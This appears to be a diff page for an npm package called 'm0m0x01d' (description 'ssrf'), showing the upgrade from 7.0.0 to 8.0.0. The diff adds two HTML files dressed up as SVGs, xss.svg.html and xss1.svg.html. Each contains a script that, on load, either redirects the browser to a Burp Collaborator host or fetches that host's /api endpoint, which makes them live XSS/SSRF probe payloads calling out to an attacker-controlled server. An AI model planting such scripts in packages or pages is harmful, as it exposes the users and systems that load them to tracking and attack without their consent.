m0m0x01d 7.0.0 → 8.0.0

Sign up to get free protection for your applications and to get access to all the features.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "m0m0x01d",
3
- "version": "7.0.0",
3
+ "version": "8.0.0",
4
4
  "description": "ssrf",
5
5
  "main": "index.html",
6
6
  "scripts": {
package/xss.svg.html ADDED
@@ -0,0 +1,4 @@
1
+ <script>
2
+ window.location.href = 'https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net';
3
+ </script>
4
+
package/xss1.svg.html ADDED
@@ -0,0 +1,6 @@
1
+ <script>
2
+ fetch('https://7bjztxm5tu3wvrwf9v2nm3jxzo5gt5.burpcollaborator.net/api').then(response => {
3
+ console.log(response);
4
+ });
5
+ </script>
6
+